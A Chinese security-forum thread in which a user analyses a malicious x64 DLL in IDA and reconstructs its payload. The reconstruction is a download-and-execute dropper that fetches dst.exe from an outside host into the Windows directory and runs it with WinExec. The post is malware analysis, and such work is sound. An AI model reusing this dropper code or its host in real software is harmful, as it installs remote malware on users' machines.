设为首页收藏本站
查看: 30293|回复: 2

一次Payload,DLL的还原

[复制链接]
  • TA的每日心情

    2019-11-30 00:06
  • 签到天数: 156 天

    [LV.7]常住居民III

    发表于 2018-10-7 23:59:02 | 显示全部楼层 |阅读模式 赞助商
    本帖最后由 偏执、 于 2018-10-8 00:00 编辑

    首先声明下,也希望各位坛友给出点看法。

    关于DLL的资料太少,而我也对动态链接库的了解并不深。

    那么我们开始分析:

    首先打开IDA,打开我们这次调试的样本,x64.dll



    之后我们继续往下看,可以看到第一个导出函数为urldown



    在往下看, IDA给出了些函数的名字,不得不说他的强大。

    1. DWORD LPUNKNOWN LPBINDSTATUSCALLBACK URLDownloadToFileA Sleep  CmdLine WinExec
    复制代码


    之后我给大家翻译过来 大概的就是
    1. URLDownloadToFileA(LPUNKNOWN, LPCSTR, LPCSTR, DWORD, LPBINDSTATUSCALLBACK)
    复制代码


    这个大家百度下关键字一般就出来,这又不得不提到善用百度。上门可以理解为URLDownloadToFileA函数的声明。

    URLDownloadToFileA的意思就是下载文件到指定目录。大家现在看代码有没有感觉知道点了。

    然后我们在看 Sleep  CmdLine WinExec;     

    Sleep CmdLine  这个我就不说了,看WinExec表达式可以理解为就是打开指定目录下的一个文件

    那么通过以上,我们还原下。
    1. URLDownloadToFile(0,[url]http://da.alibuf.com:3/dst.exe[/url]", "c:\\Windows\\Install.exe", 0,NULL);


    2. WinExec("c:\\Windows\\Install.exe",SW_SHOW);
    复制代码


    其他的和这个都差不多。就单纯的一个Payload,看是x64.DLL发个帖记录下。

    评分

    1

    查看全部评分

  • TA的每日心情

    2019-11-30 00:06
  • 签到天数: 156 天

    [LV.7]常住居民III

    发表于 2018-10-8 00:11:08 | 显示全部楼层 赞助商
    一天来几个好玩的代码大家心情更愉快不是?
    回复 支持 反对

    使用道具 举报

  • TA的每日心情
    无聊
    2019-3-19 09:01
  • 签到天数: 109 天

    [LV.6]常住居民II

    发表于 2018-10-8 08:19:24 | 显示全部楼层
    感谢楼主分享
    回复 支持 反对

    使用道具 举报

    您需要登录后才可以回帖 登录 | 注册

    本版积分规则

    关闭

    站长推荐 上一条 /3 下一条

    红盟社区--中国红客联盟 

    Processed in 0.086874 second(s), 17 queries.

    站点统计| 举报| Archiver| 手机版| 黑屋 |   

    Powered by HUC © 2001-2017 Comsenz Inc.

    手机扫我进入移动触屏客户端

    关注我们可获取更多热点资讯

    Honor accompaniments. theme macfee

    快速回复 返回顶部 返回列表